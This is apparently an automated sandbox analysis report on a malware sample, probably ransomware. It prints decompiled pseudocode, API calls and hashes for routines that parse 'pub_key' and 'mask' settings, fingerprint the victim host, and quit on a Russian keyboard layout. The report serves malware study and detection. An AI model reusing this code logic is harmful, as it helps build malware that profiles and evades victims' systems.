lstrcpyA.KERNEL32(?,fabian wosar <3,?,0F1D5034), ref: 0F1D4D3D
lstrlenA.KERNEL32(00000000,?,0F1D5034), ref: 0F1D4D97
lstrcpyA.KERNEL32(?,?,?,0F1D5034), ref: 0F1D4DC8

Strings

fabian wosar <3, xrefs: 0F1D4D35

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: fabian wosar <3
API String ID: 367037083-1724090804
Opcode ID: 35f4b120eb35823d306d431ca2ca067bc6423bc21f38172dd523ef142acd007e
Instruction ID: 136baa247b6b817145aed30153b94126b6763d4070a77531a97e2b84b0f74555
Opcode Fuzzy Hash: 35f4b120eb35823d306d431ca2ca067bc6423bc21f38172dd523ef142acd007e
Instruction Fuzzy Hash: 33313625809EA94BDF36CE3858643FABFB5AF67111F9852C9F8C58B207D3316466C390

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D3190 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 42
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F1D3190(CHAR* _a4) {
				char _t6;
				CHAR* _t13;
				CHAR* _t16;

				_t13 = _a4;
				_t16 = _t13;
				if( *_t13 == 0) {
					L5:
					lstrcmpiA(_t13, "mask");
					_t10 =  ==  ? 1 : 0;
					lstrcmpiA(_a4, "pub_key");
					 *_t16 = 0x3d;
					_t11 =  ==  ? 2 :  ==  ? 1 : 0;
					_t5 =  ==  ? 2 :  ==  ? 1 : 0;
					return  ==  ? 2 :  ==  ? 1 : 0;
				} else {
					while(1) {
						_t6 =  *_t16;
						if(_t6 == 0x7d) {
							break;
						}
						if(_t6 == 0x3d) {
							 *_t16 = 0;
							goto L5;
						} else {
							_t16 =  &(_t16[1]);
							if( *_t16 != 0) {
								continue;
							} else {
								goto L5;
							}
						}
						goto L8;
					}
					return 0;
				}
				L8:
			}

0x0f1d3193
0x0f1d3197
0x0f1d319c
0x0f1d31b0
0x0f1d31b9
0x0f1d31ce
0x0f1d31d1
0x0f1d31d9
0x0f1d31e1
0x0f1d31e4
0x0f1d31e9
0x0f1d31a0
0x0f1d31a0
0x0f1d31a0
0x0f1d31a4
0x00000000
0x00000000
0x0f1d31a8
0x0f1d31ec
0x00000000
0x0f1d31aa
0x0f1d31aa
0x0f1d31ae
0x00000000
0x00000000
0x00000000
0x00000000
0x0f1d31ae
0x00000000
0x0f1d31a8
0x0f1d31f5
0x0f1d31f5
0x00000000

APIs

lstrcmpiA.KERNEL32(0F1D52F0,mask,0F1D52F1,?,?,0F1D3441,0F1D52F1,00000000,00000000,77296980,?,?,0F1D52F0,00000000), ref: 0F1D31B9
lstrcmpiA.KERNEL32(0F1D52F0,pub_key,?,0F1D3441,0F1D52F1,00000000,00000000,77296980,?,?,0F1D52F0,00000000), ref: 0F1D31D1

Strings

mask, xrefs: 0F1D31B1
pub_key, xrefs: 0F1D31BF

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: mask$pub_key
API String ID: 1586166983-1355590148
Opcode ID: 37da891af78efabf88820905d8be5d55c8289bd6bcdcc75eb460297e4dc82360
Instruction ID: c113d595cbaf6f33f80e0bb4cd6ad1da62cbd41fe3d5b753cafb6e38dc22cf60
Opcode Fuzzy Hash: 37da891af78efabf88820905d8be5d55c8289bd6bcdcc75eb460297e4dc82360
Instruction Fuzzy Hash: F4F0467230838A1EE7194EA89C457A2BBEC9B01310F84007EF68AC2142C3AA98A2C351

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: wjaoab.exePID: 5444, Parent PID: 3320COMMON

Execution Graph

Execution Coverage:	5.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	693
Total number of Limit Nodes:	10

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0FBC4950 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 182
threadsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FBC4950() {
				void* _v8;
				void* _v12;
				CHAR* _v16;
				int _v20;
				void* _v24;
				int _v28;
				void* _v32;
				int _v36;
				int _v40;
				int _v44;
				int _v48;
				int _v52;
				int _v60;
				char _v80;
				void* _t54;
				int _t79;
				void* _t81;
				short* _t97;
				void* _t114;

				Sleep(0x3e8); // executed
				_t54 = E0FBC4600(_t90, _t106); // executed
				if(_t54 == 0) {
					_v8 = CreateThread(0, 0, E0FBC2D30, 0, 0, 0);
					if(_v8 != 0) {
						if(WaitForSingleObject(_v8, 0x1388) == 0x102) {
							_t90 = _v8;
							TerminateThread(_v8, 0);
						}
						_t106 = _v8;
						CloseHandle(_v8);
					}
					E0FBC46F0();
					E0FBC40E0(_t90, _t106);
					E0FBC6420( &_v80);
					_v40 = 0;
					_v36 = 0;
					_v28 = 0;
					_v44 = 0;
					E0FBC63D0( &_v80,  &_v28,  &_v44,  &_v40,  &_v36);
					_v48 = 0;
					_v16 = 0;
					if(E0FBC4930(_v28) == 0) {
						while(_v48 == 0) {
							_t81 = E0FBC5880(_v28, _v44, _v40, _v36,  &_v16);
							_t114 = _t114 + 0xc;
							if(_t81 != 0) {
								_v48 = 1;
							} else {
								Sleep(0x2710);
							}
						}
						E0FBC6390( &_v80);
						_v32 = 0;
						_v20 = 0;
						_v52 = 0;
						_v60 = 0;
						__eflags = _v16;
						if(_v16 == 0) {
							L19:
							E0FBC4030();
							InitializeCriticalSection(0xfbd2a48);
							__eflags = _v52;
							if(__eflags == 0) {
								E0FBC3E20( &_v80);
							} else {
								E0FBC4000(_v32, _v20, __eflags);
							}
							DeleteCriticalSection(0xfbd2a48);
							__eflags = E0FBC3AA0();
							if(__eflags != 0) {
								E0FBC43E0(__eflags);
							}
							_v24 = VirtualAlloc(0, 0x200, 0x3000, 4);
							__eflags = _v24;
							if(__eflags != 0) {
								GetModuleFileNameW(0, _v24, 0x100);
								E0FBC3BE0(_v24, _v24, __eflags);
								VirtualFree(_v24, 0, 0x8000);
							}
							__eflags =  *0xfbd2a44;
							if( *0xfbd2a44 != 0) {
								_t97 =  *0xfbd2a44; // 0x60000
								ShellExecuteW(0, L"open", _t97, 0, 0, 5);
							}
							ExitThread(0);
						}
						_v20 = lstrlenA(_v16);
						_v32 = VirtualAlloc(0, _v20, 0x3000, 4);
						_t79 = CryptStringToBinaryA(_v16, 0, 1, _v32,  &_v20, 0, 0);
						__eflags = _t79;
						if(_t79 != 0) {
							_v52 = 1;
							goto L19;
						}
						ExitProcess(0);
					} else {
						_v12 = VirtualAlloc(0, 0x200, 0x3000, 4);
						_t119 = _v12;
						if(_v12 != 0) {
							GetModuleFileNameW(0, _v12, 0x100);
							E0FBC3BE0(_v12,  &_v44, _t119);
							VirtualFree(_v12, 0, 0x8000);
						}
						ExitProcess(0);
					}
				}
				ExitProcess(0); // executed
			}

0x0fbc495b
0x0fbc4961
0x0fbc4968
0x0fbc4987
0x0fbc498e
0x0fbc49a4
0x0fbc49a8
0x0fbc49ac
0x0fbc49ac
0x0fbc49b2
0x0fbc49b6
0x0fbc49b6
0x0fbc49bc
0x0fbc49c1
0x0fbc49c9
0x0fbc49ce
0x0fbc49d5
0x0fbc49dc
0x0fbc49e3
0x0fbc49fd
0x0fbc4a02
0x0fbc4a09
0x0fbc4a1a
0x0fbc4a6b
0x0fbc4a83
0x0fbc4a88
0x0fbc4a8d
0x0fbc4a9c
0x0fbc4a8f
0x0fbc4a94
0x0fbc4a94
0x0fbc4aa3
0x0fbc4aa8
0x0fbc4aad
0x0fbc4ab4
0x0fbc4abb
0x0fbc4ac2
0x0fbc4ac9
0x0fbc4acd
0x0fbc4b1f
0x0fbc4b1f
0x0fbc4b29
0x0fbc4b2f
0x0fbc4b33
0x0fbc4b45
0x0fbc4b35
0x0fbc4b3b
0x0fbc4b3b
0x0fbc4b4f
0x0fbc4b5a
0x0fbc4b5c
0x0fbc4b5e
0x0fbc4b5e
0x0fbc4b77
0x0fbc4b7a
0x0fbc4b7e
0x0fbc4b8b
0x0fbc4b94
0x0fbc4ba4
0x0fbc4ba4
0x0fbc4baa
0x0fbc4bb1
0x0fbc4bb9
0x0fbc4bc7
0x0fbc4bc7
0x0fbc4bcf
0x0fbc4bcf
0x0fbc4ad9
0x0fbc4aef
0x0fbc4b06
0x0fbc4b0c
0x0fbc4b0e
0x0fbc4b18
0x00000000
0x0fbc4b18
0x0fbc4b12
0x0fbc4a1c
0x0fbc4a30
0x0fbc4a33
0x0fbc4a37
0x0fbc4a44
0x0fbc4a4d
0x0fbc4a5d
0x0fbc4a5d
0x0fbc4a65
0x0fbc4a65
0x0fbc4a1a
0x0fbc496c

APIs

Sleep.KERNELBASE(000003E8), ref: 0FBC495B

Part of subcall function 0FBC4600: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC465C
Part of subcall function 0FBC4600: lstrcpyW.KERNEL32 ref: 0FBC467F
Part of subcall function 0FBC4600: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC4686
Part of subcall function 0FBC4600: CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC469E
Part of subcall function 0FBC4600: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC46AA
Part of subcall function 0FBC4600: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC46B1
Part of subcall function 0FBC4600: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC46CB

ExitProcess.KERNEL32 ref: 0FBC496C
CreateThread.KERNEL32(00000000,00000000,0FBC2D30,00000000,00000000,00000000), ref: 0FBC4981
WaitForSingleObject.KERNEL32(00000000,00001388), ref: 0FBC4999
TerminateThread.KERNEL32(00000000,00000000), ref: 0FBC49AC
CloseHandle.KERNEL32(00000000), ref: 0FBC49B6
VirtualAlloc.KERNEL32(00000000,00000200,00003000,00000004,00000000,00000000,00000000,00000000), ref: 0FBC4A2A
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0FBC4A44
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC4A5D
ExitProcess.KERNEL32 ref: 0FBC4A65

Strings

open, xrefs: 0FBC4BC0

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Virtual$AllocCreateErrorExitFreeLastProcessThread$CloseFileHandleModuleMutexNameObjectSingleSleepTerminateWaitlstrcpylstrlen
String ID: open
API String ID: 1803241880-2758837156
Opcode ID: 8eac0ac5db6267d11355422d4e8bf90c6563e033f1cb4607bf3360a43daf6d8b
Instruction ID: 6c093c87acd108faf95323a79afe817e92a75b64ba8e3401ae431015423a6a57
Opcode Fuzzy Hash: 8eac0ac5db6267d11355422d4e8bf90c6563e033f1cb4607bf3360a43daf6d8b
Instruction Fuzzy Hash: D4711F70A40309EBEB14DBA1EC69FDF7778EB48B12F104098E2016B1C1D7B86645CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC7330 Relevance: 144.0, APIs: 55, Strings: 27, Instructions: 499
memorystringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E0FBC7330(DWORD* __ecx, void* __edx) {
				void* _v8;
				void* _v12;
				long _v16;
				long _v20;
				int _v24;
				int _v28;
				intOrPtr _v32;
				short _v36;
				short _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				signed short _v76;
				char _v132;
				void* _t154;
				long _t155;
				short _t158;
				short _t159;
				short _t160;
				signed int _t161;
				signed int _t166;
				void* _t181;
				signed int _t183;
				signed int _t186;
				WCHAR* _t190;
				void* _t191;
				void* _t199;
				_Unknown_base(*)()* _t204;
				signed int _t211;
				intOrPtr _t216;
				WCHAR* _t218;
				WCHAR* _t220;
				void* _t224;
				int _t230;
				void* _t238;
				WCHAR* _t246;
				void* _t247;
				WCHAR* _t249;
				WCHAR* _t250;
				WCHAR* _t252;
				void* _t256;
				DWORD* _t260;
				short* _t261;
				DWORD* _t266;
				void* _t267;
				signed int _t270;
				void* _t274;
				void* _t276;
				void* _t277;
				DWORD* _t279;
				void* _t280;
				void* _t281;

				_t267 = __edx;
				_t260 = __ecx;
				_t279 = __ecx;
				if( *__ecx != 0) {
					_t252 = VirtualAlloc(0, 0x202, 0x3000, 4);
					_t260 =  &_v24;
					 *(_t279 + 8) = _t252;
					_v24 = 0x100;
					GetUserNameW(_t252, _t260);
				}
				if( *((intOrPtr*)(_t279 + 0xc)) != 0) {
					_v24 = 0x1e;
					_t250 = VirtualAlloc(0, 0x20, 0x3000, 4);
					_t260 =  &_v24;
					 *(_t279 + 0x14) = _t250;
					GetComputerNameW(_t250, _t260);
				}
				if( *((intOrPtr*)(_t279 + 0x18)) == 0) {
					L11:
					if( *(_t279 + 0x30) == 0) {
						L18:
						if( *((intOrPtr*)(_t279 + 0x3c)) == 0) {
							L31:
							if( *((intOrPtr*)(_t279 + 0x48)) != 0) {
								_t220 = VirtualAlloc(0, 0x82, 0x3000, 4);
								_push(_t260);
								 *(_t279 + 0x50) = _t220;
								if(E0FBC72B0(_t260, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"productName", _t220, 0x80) == 0) {
									_push(_t260);
									E0FBC72B0(_t260, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t279 + 0x50), 0x80);
									wsprintfW( *(_t279 + 0x50), L"error");
									_t281 = _t281 + 8;
								}
							}
							if( *((intOrPtr*)(_t279 + 0x54)) == 0) {
								L44:
								if( *((intOrPtr*)(_t279 + 0x24)) != 0) {
									_v28 = 0;
									_t216 = E0FBC7A10(_t279 + 0x2c,  &_v28);
									if(_t216 == 0) {
										 *((intOrPtr*)(_t279 + 0x24)) = _t216;
									}
								}
								if( *((intOrPtr*)(_t279 + 0x60)) != 0) {
									_t190 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
									 *(_t279 + 0x68) = _t190;
									_t191 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
									_t276 = _t191;
									GetWindowsDirectoryW(_t276, 0x100);
									_t66 = _t276 + 0x600; // 0x600
									_t266 = _t66;
									 *((short*)(_t276 + 6)) = 0;
									_t68 = _t276 + 0x400; // 0x400
									_t69 = _t276 + 0x604; // 0x604
									_t70 = _t276 + 0x608; // 0x608
									_t71 = _t276 + 0x200; // 0x200
									GetVolumeInformationW(_t276, _t71, 0x100, _t266, _t70, _t69, _t68, 0x100); // executed
									_push(_t266);
									_t72 = _t276 + 0x60c; // 0x60c
									_t260 = _t72;
									_t199 = E0FBC72B0(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"ProcessorNameString", _t260, 0x80); // executed
									if(_t199 != 0) {
										_t73 = _t276 + 0x60c; // 0x60c
										_t211 = lstrlenW(_t73);
										_t74 = _t276 + 0x60c; // 0x60c
										_t260 = _t74;
										_push(_t260);
										E0FBC72B0(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t260 + _t211 * 2, 0x80); // executed
									}
									wsprintfW( *(_t279 + 0x68), L"%d",  *(_t276 + 0x600));
									_t79 = _t276 + 0x60c; // 0x60c
									_t281 = _t281 + 0xc;
									lstrcatW( *(_t279 + 0x68), _t79);
									_t204 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
									_v28 = _t204;
									if(_t204 == 0) {
										 *(_t279 + 0x6c) = 0;
									} else {
										 *(_t279 + 0x6c) = _v28(0x29a,  *(_t279 + 0x68), lstrlenW( *(_t279 + 0x68)) + _t207);
									}
									 *(_t279 + 0x70) =  *(_t276 + 0x600);
									VirtualFree(_t276, 0, 0x8000); // executed
								}
								if( *((intOrPtr*)(_t279 + 0x74)) == 0) {
									L67:
									if( *(_t279 + 0x80) == 0) {
										L72:
										return 1;
									}
									_t154 = VirtualAlloc(0, 0x81, 0x3000, 4);
									 *(_t279 + 0x84) = _t154;
									if(_t154 == 0) {
										L71:
										 *(_t279 + 0x80) = 0;
										goto L72;
									}
									_push(_t260);
									_t155 = E0FBC6E90(_t154);
									if(_t155 != 0) {
										goto L72;
									}
									VirtualFree( *(_t279 + 0x84), _t155, 0x8000);
									goto L71;
								} else {
									_v68 = L"UNKNOWN";
									_v64 = L"NO_ROOT_DIR";
									_v60 = L"REMOVABLE";
									_v56 = L"FIXED";
									_v52 = L"REMOTE";
									_v48 = L"CDROM";
									_v44 = L"RAMDISK";
									 *(_t279 + 0x7c) = VirtualAlloc(0, 0x400, 0x3000, 4);
									_t261 =  &_v132;
									_t158 = 0x41;
									do {
										 *_t261 = _t158;
										_t261 = _t261 + 2;
										_t158 = _t158 + 1;
									} while (_t158 <= 0x5a);
									_t159 =  *L"?:\\"; // 0x3a003f
									_v40 = _t159;
									_t160 =  *0xfbcf348; // 0x5c
									_v36 = _t160;
									_t161 = 0;
									_v24 = 0;
									do {
										_v40 =  *((intOrPtr*)(_t280 + _t161 * 2 - 0x80));
										_t270 = GetDriveTypeW( &_v40);
										if(_t270 > 2 && _t270 != 5) {
											_v36 = 0;
											lstrcatW( *(_t279 + 0x7c),  &_v40);
											_v36 = 0x5c;
											lstrcatW( *(_t279 + 0x7c),  *(_t280 + _t270 * 4 - 0x40));
											lstrcatW( *(_t279 + 0x7c), "_");
											if(GetDiskFreeSpaceW( &_v40,  &_v28,  &_v20,  &_v12,  &_v16) == 0) {
												lstrcatW( *(_t279 + 0x7c), L"0,");
												goto L64;
											}
											_v8 = E0FBC8950(_v16, 0, _v28 * _v20, 0);
											_t256 = _t267;
											_t181 = E0FBC8950(_v12, 0, _v28 * _v20, 0);
											_t274 = _v8;
											_v32 = _t274 - _t181;
											asm("sbb eax, edx");
											_v8 = _t256;
											_t183 = lstrlenW( *(_t279 + 0x7c));
											_push(_t256);
											wsprintfW( &(( *(_t279 + 0x7c))[_t183]), L"%I64u/", _t274);
											_t186 = lstrlenW( *(_t279 + 0x7c));
											_push(_v8);
											wsprintfW( &(( *(_t279 + 0x7c))[_t186]), L"%I64u", _v32);
											_t281 = _t281 + 0x20;
											lstrcatW( *(_t279 + 0x7c), ",");
										}
										_t161 = _v24 + 1;
										_v24 = _t161;
									} while (_t161 < 0x1b);
									_t166 = lstrlenW( *(_t279 + 0x7c));
									_t260 =  *(_t279 + 0x7c);
									 *((short*)(_t260 + _t166 * 2 - 2)) = 0;
									goto L67;
								}
							} else {
								__imp__GetNativeSystemInfo( &_v76);
								_t218 = VirtualAlloc(0, 0x40, 0x3000, 4);
								_t260 = _v76 & 0x0000ffff;
								 *(_t279 + 0x5c) = _t218;
								if(_t260 > 9) {
									L42:
									_push(L"Unknown");
									L43:
									wsprintfW(_t218, ??);
									_t281 = _t281 + 8;
									goto L44;
								}
								_t260 =  *(_t260 + E0FBC7A00) & 0x000000ff;
								switch( *((intOrPtr*)(_t260 * 4 +  &M0FBC79EC))) {
									case 0:
										_push(L"x86");
										goto L43;
									case 1:
										_push(L"ARM");
										goto L43;
									case 2:
										_push(L"Itanium");
										goto L43;
									case 3:
										_push(L"x64");
										goto L43;
									case 4:
										goto L42;
								}
							}
						}
						_t224 = VirtualAlloc(0, 0x8a, 0x3000, 4);
						_v8 = _t224;
						_v20 = _t224 + 0xe;
						 *(_t279 + 0x44) = VirtualAlloc(0, 4, 0x3000, 4);
						_t277 = 1;
						_v24 = 1;
						do {
							wsprintfW(_v8, L"%d", _t277);
							_t281 = _t281 + 0xc;
							_v16 = 0;
							_t277 = _t277 + 1;
							if(RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v12) != 0) {
								L27:
								_t230 = 0;
								_v24 = 0;
								goto L28;
							}
							_v28 = 0x80;
							if(RegQueryValueExW(_v12, _v8, 0, 0, _v20,  &_v28) != 0) {
								GetLastError();
							} else {
								_v16 = 1;
							}
							RegCloseKey(_v12);
							if(_v16 == 0) {
								goto L27;
							} else {
								if(lstrcmpiW(_v20, L"00000419") == 0) {
									_t218 = wsprintfW( *(_t279 + 0x44), "1");
									_t281 = _t281 + 8;
									ExitProcess(0);
								}
								_t230 = _v24;
							}
							L28:
						} while (_t277 != 9 && _t230 != 0);
						wsprintfW( *(_t279 + 0x44), "0");
						_t281 = _t281 + 8;
						VirtualFree(_v8, 0, 0x8000);
						goto L31;
					}
					_t238 = VirtualAlloc(0, 0x80, 0x3000, 4);
					_v20 = _t238;
					 *(_t279 + 0x38) = _t238;
					_v12 = 0;
					if(RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v8) != 0) {
						L17:
						 *(_t279 + 0x30) = 0;
						VirtualFree( *(_t279 + 0x38), 0, 0x8000);
						goto L18;
					}
					_v24 = 0x40;
					if(RegQueryValueExW(_v8, L"LocaleName", 0, 0, _v20,  &_v24) != 0) {
						GetLastError();
					} else {
						_v12 = 1;
					}
					RegCloseKey(_v8);
					if(_v12 != 0) {
						goto L18;
					} else {
						goto L17;
					}
				} else {
					_t246 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					 *(_t279 + 0x20) = _t246;
					if(_t246 == 0) {
						goto L11;
					}
					_push(_t260);
					_t247 = E0FBC72B0(_t260, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t246, 0x80); // executed
					if(_t247 == 0) {
						wsprintfW( *(_t279 + 0x20), L"undefined");
						L10:
						_t281 = _t281 + 8;
						goto L11;
					}
					_t249 =  *(_t279 + 0x20);
					if( *_t249 != 0) {
						goto L11;
					}
					wsprintfW(_t249, L"WORKGROUP");
					goto L10;
				}
			}

0x0fbc7330
0x0fbc7330
0x0fbc733b
0x0fbc7347
0x0fbc7357
0x0fbc7359
0x0fbc735c
0x0fbc7361
0x0fbc7368
0x0fbc7368
0x0fbc7372
0x0fbc737f
0x0fbc7386
0x0fbc7388
0x0fbc738b
0x0fbc7390
0x0fbc7390
0x0fbc73a0
0x0fbc73f6
0x0fbc73fa
0x0fbc7495
0x0fbc7499
0x0fbc7599
0x0fbc759d
0x0fbc75ad
0x0fbc75af
0x0fbc75c5
0x0fbc75cf
0x0fbc75d1
0x0fbc75e9
0x0fbc75f6
0x0fbc75f8
0x0fbc75f8
0x0fbc75cf
0x0fbc75ff
0x0fbc766e
0x0fbc7672
0x0fbc7677
0x0fbc7683
0x0fbc768a
0x0fbc768c
0x0fbc768c
0x0fbc768a
0x0fbc7693
0x0fbc76a7
0x0fbc76b7
0x0fbc76ba
0x0fbc76bc
0x0fbc76c4
0x0fbc76cc
0x0fbc76cc
0x0fbc76d7
0x0fbc76db
0x0fbc76e2
0x0fbc76e9
0x0fbc76f6
0x0fbc76fe
0x0fbc7704
0x0fbc770a
0x0fbc770a
0x0fbc7720
0x0fbc7727
0x0fbc7729
0x0fbc7730
0x0fbc7736
0x0fbc7736
0x0fbc773c
0x0fbc7755
0x0fbc7755
0x0fbc7768
0x0fbc7770
0x0fbc7776
0x0fbc777d
0x0fbc7790
0x0fbc7796
0x0fbc779b
0x0fbc77b9
0x0fbc779d
0x0fbc77b4
0x0fbc77b4
0x0fbc77ce
0x0fbc77d1
0x0fbc77d1
0x0fbc77e3
0x0fbc7992
0x0fbc7999
0x0fbc79e2
0x0fbc79eb
0x0fbc79eb
0x0fbc79a9
0x0fbc79af
0x0fbc79b7
0x0fbc79d6
0x0fbc79d6
0x00000000
0x0fbc79d6
0x0fbc79b9
0x0fbc79bb
0x0fbc79c2
0x00000000
0x00000000
0x0fbc79d0
0x00000000
0x0fbc77e9
0x0fbc77f7
0x0fbc77fe
0x0fbc7805
0x0fbc780c
0x0fbc7813
0x0fbc781a
0x0fbc7821
0x0fbc782e
0x0fbc7831
0x0fbc7834
0x0fbc7840
0x0fbc7840
0x0fbc7843
0x0fbc7846
0x0fbc7847
0x0fbc784d
0x0fbc7852
0x0fbc7855
0x0fbc785a
0x0fbc785d
0x0fbc785f
0x0fbc7862
0x0fbc7867
0x0fbc7875
0x0fbc787a
0x0fbc788b
0x0fbc7896
0x0fbc78a4
0x0fbc78a8
0x0fbc78b2
0x0fbc78d0
0x0fbc796b
0x00000000
0x0fbc796b
0x0fbc78f2
0x0fbc78f5
0x0fbc78f7
0x0fbc78fc
0x0fbc7908
0x0fbc790b
0x0fbc790d
0x0fbc7910
0x0fbc7919
0x0fbc792a
0x0fbc7938
0x0fbc793a
0x0fbc794c
0x0fbc7954
0x0fbc795f
0x0fbc795f
0x0fbc7976
0x0fbc7977
0x0fbc797a
0x0fbc7986
0x0fbc7988
0x0fbc798d
0x00000000
0x0fbc798d
0x0fbc7601
0x0fbc7605
0x0fbc7616
0x0fbc7618
0x0fbc761c
0x0fbc7622
0x0fbc7663
0x0fbc7663
0x0fbc7668
0x0fbc7669
0x0fbc766b
0x00000000
0x0fbc766b
0x0fbc7624
0x0fbc762b
0x00000000
0x0fbc765c
0x00000000
0x00000000
0x0fbc764e
0x00000000
0x00000000
0x0fbc7655
0x00000000
0x00000000
0x0fbc7647
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbc762b
0x0fbc75ff
0x0fbc74ad
0x0fbc74b6
0x0fbc74c0
0x0fbc74c5
0x0fbc74c8
0x0fbc74cd
0x0fbc74d4
0x0fbc74dd
0x0fbc74df
0x0fbc74e2
0x0fbc74ec
0x0fbc7507
0x0fbc7564
0x0fbc7564
0x0fbc7566
0x00000000
0x0fbc7566
0x0fbc750c
0x0fbc7529
0x0fbc7534
0x0fbc752b
0x0fbc752b
0x0fbc752b
0x0fbc753d
0x0fbc7547
0x00000000
0x0fbc7549
0x0fbc7559
0x0fbc763a
0x0fbc763c
0x0fbc7641
0x0fbc7641
0x0fbc755f
0x0fbc755f
0x0fbc7569
0x0fbc7569
0x0fbc757e
0x0fbc7580
0x0fbc758d
0x00000000
0x0fbc7593
0x0fbc740e
0x0fbc7410
0x0fbc7413
0x0fbc742b
0x0fbc743a
0x0fbc747e
0x0fbc7488
0x0fbc748f
0x00000000
0x0fbc748f
0x0fbc743f
0x0fbc745e
0x0fbc7469
0x0fbc7460
0x0fbc7460
0x0fbc7460
0x0fbc7472
0x0fbc747c
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbc73a2
0x0fbc73b0
0x0fbc73b2
0x0fbc73b7
0x00000000
0x00000000
0x0fbc73b9
0x0fbc73cf
0x0fbc73d6
0x0fbc73f1
0x0fbc73f1
0x0fbc73f3
0x00000000
0x0fbc73f3
0x0fbc73d8
0x0fbc73df
0x00000000
0x00000000
0x0fbc73f1
0x00000000
0x0fbc73f1

APIs

VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0FBC7357
GetUserNameW.ADVAPI32(00000000,?), ref: 0FBC7368
VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0FBC7386
GetComputerNameW.KERNEL32 ref: 0FBC7390
VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0FBC73B0
wsprintfW.USER32 ref: 0FBC73F1
VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FBC740E
RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FBC7432
RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,0FBC4640,?), ref: 0FBC7456
GetLastError.KERNEL32 ref: 0FBC7469
RegCloseKey.ADVAPI32(00000000), ref: 0FBC7472
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FBC748F
